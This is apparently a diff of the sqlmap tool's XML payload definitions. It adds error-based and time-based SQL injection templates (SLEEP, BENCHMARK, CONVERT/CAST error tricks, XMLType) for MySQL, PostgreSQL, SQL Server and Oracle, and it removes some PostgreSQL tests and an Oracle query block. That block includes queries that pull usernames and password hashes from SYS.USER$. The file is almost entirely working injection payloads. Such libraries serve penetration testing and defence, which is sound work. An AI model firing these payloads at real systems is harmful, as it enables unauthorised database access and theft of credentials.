<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -473,6 +481,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -491,6 +500,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -511,6 +521,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -526,6 +537,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -545,6 +557,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -563,6 +576,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -581,6 +595,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -601,6 +616,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -619,6 +635,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -638,6 +655,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
|
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -656,6 +674,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
|
<payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -674,6 +693,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -699,6 +719,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -718,6 +739,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -736,6 +758,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -754,6 +777,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -772,6 +796,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -791,6 +816,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>2,3</clause>
|
<clause>2,3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -809,6 +835,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -827,6 +854,7 @@ Formats:
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>3</clause>
|
<clause>3</clause>
|
||||||
<where>3</where>
|
<where>3</where>
|
||||||
|
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1078,6 +1106,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND SLEEP([SLEEPTIME])</payload>
|
<payload>AND SLEEP([SLEEPTIME])</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1097,6 +1126,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1108,25 +1138,6 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
|
||||||
<title>PostgreSQL > 8.1 AND time-based blind</title>
|
|
||||||
<stype>5</stype>
|
|
||||||
<level>1</level>
|
|
||||||
<risk>1</risk>
|
|
||||||
<clause>1</clause>
|
|
||||||
<where>1</where>
|
|
||||||
<request>
|
|
||||||
<payload>AND PG_SLEEP([SLEEPTIME])</payload>
|
|
||||||
</request>
|
|
||||||
<response>
|
|
||||||
<time>[SLEEPTIME]</time>
|
|
||||||
</response>
|
|
||||||
<details>
|
|
||||||
<dbms>PostgreSQL</dbms>
|
|
||||||
<dbms_version>> 8.1</dbms_version>
|
|
||||||
</details>
|
|
||||||
</test>
|
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>SQLite > 2.0 AND time-based blind</title>
|
<title>SQLite > 2.0 AND time-based blind</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
@ -1134,6 +1145,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1154,6 +1166,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
<payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1167,7 +1180,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
<!--
|
<!--
|
||||||
NOTE: there is no way to perform this test against Microsoft SQL
|
NOTE: there is no way to perform this test against Microsoft SQL
|
||||||
Server, Sybase, Oracle or PostgreSQL < 8.2
|
Server, Sybase, Oracle or PostgreSQL
|
||||||
-->
|
-->
|
||||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||||
<!-- End of AND time-based blind tests -->
|
<!-- End of AND time-based blind tests -->
|
||||||
|
@ -1181,6 +1194,7 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR SLEEP([SLEEPTIME])</payload>
|
<payload>OR SLEEP([SLEEPTIME])</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1200,6 +1214,7 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1211,25 +1226,6 @@ Formats:
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
|
||||||
<title>PostgreSQL > 8.1 OR time-based blind</title>
|
|
||||||
<stype>5</stype>
|
|
||||||
<level>2</level>
|
|
||||||
<risk>3</risk>
|
|
||||||
<clause>1</clause>
|
|
||||||
<where>1</where>
|
|
||||||
<request>
|
|
||||||
<payload>OR PG_SLEEP([SLEEPTIME])</payload>
|
|
||||||
</request>
|
|
||||||
<response>
|
|
||||||
<time>[SLEEPTIME]</time>
|
|
||||||
</response>
|
|
||||||
<details>
|
|
||||||
<dbms>PostgreSQL</dbms>
|
|
||||||
<dbms_version>> 8.1</dbms_version>
|
|
||||||
</details>
|
|
||||||
</test>
|
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>SQLite > 2.0 OR time-based blind</title>
|
<title>SQLite > 2.0 OR time-based blind</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
|
@ -1237,6 +1233,7 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1257,6 +1254,7 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<epayload></epayload>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
<payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||||
</request>
|
</request>
|
||||||
|
@ -1270,7 +1268,7 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
<!--
|
<!--
|
||||||
NOTE: there is no way to perform this test against Microsoft SQL
|
NOTE: there is no way to perform this test against Microsoft SQL
|
||||||
Server, Sybase, Oracle or PostgreSQL < 8.2
|
Server, Sybase, Oracle or PostgreSQL
|
||||||
-->
|
-->
|
||||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||||
<!-- End of OR time-based blind tests -->
|
<!-- End of OR time-based blind tests -->
|
||||||
|
|
159
xml/queries.xml
159
xml/queries.xml
|
@ -24,7 +24,6 @@
|
||||||
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
|
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
|
||||||
<substring query="MID((%s), %d, %d)"/>
|
<substring query="MID((%s), %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||||
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
|
|
||||||
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
|
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
|
||||||
<banner query="VERSION()"/>
|
<banner query="VERSION()"/>
|
||||||
<current_user query="CURRENT_USER()"/>
|
<current_user query="CURRENT_USER()"/>
|
||||||
|
@ -74,84 +73,6 @@
|
||||||
</search_column>
|
</search_column>
|
||||||
</dbms>
|
</dbms>
|
||||||
|
|
||||||
<!-- Oracle -->
|
|
||||||
<dbms value="Oracle">
|
|
||||||
<cast query="CAST(%s AS VARCHAR(4000))"/>
|
|
||||||
<length query="LENGTH(%s)"/>
|
|
||||||
<isnull query="NVL(%s, ' ')"/>
|
|
||||||
<delimiter query="||"/>
|
|
||||||
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
|
||||||
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
|
||||||
<limitgroupstart/>
|
|
||||||
<limitgroupstop/>
|
|
||||||
<limitstring/>
|
|
||||||
<order query="ORDER BY %s ASC"/>
|
|
||||||
<count query="COUNT(%s)"/>
|
|
||||||
<comment query="--"/>
|
|
||||||
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
|
|
||||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
|
||||||
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||%s||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||%s||CHR(62))) FROM DUAL)"/>
|
|
||||||
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
|
||||||
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
|
||||||
<current_user query="SELECT USER FROM DUAL"/>
|
|
||||||
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
|
||||||
<!--
|
|
||||||
NOTE: in Oracle to check if the session user is DBA you can use:
|
|
||||||
SELECT USERENV('ISDBA') FROM DUAL
|
|
||||||
-->
|
|
||||||
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
|
||||||
<users>
|
|
||||||
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
|
|
||||||
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
|
|
||||||
</users>
|
|
||||||
<passwords>
|
|
||||||
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
|
|
||||||
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
|
|
||||||
</passwords>
|
|
||||||
<!--
|
|
||||||
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
|
||||||
SELECT * FROM SESSION_PRIVS
|
|
||||||
-->
|
|
||||||
<privileges>
|
|
||||||
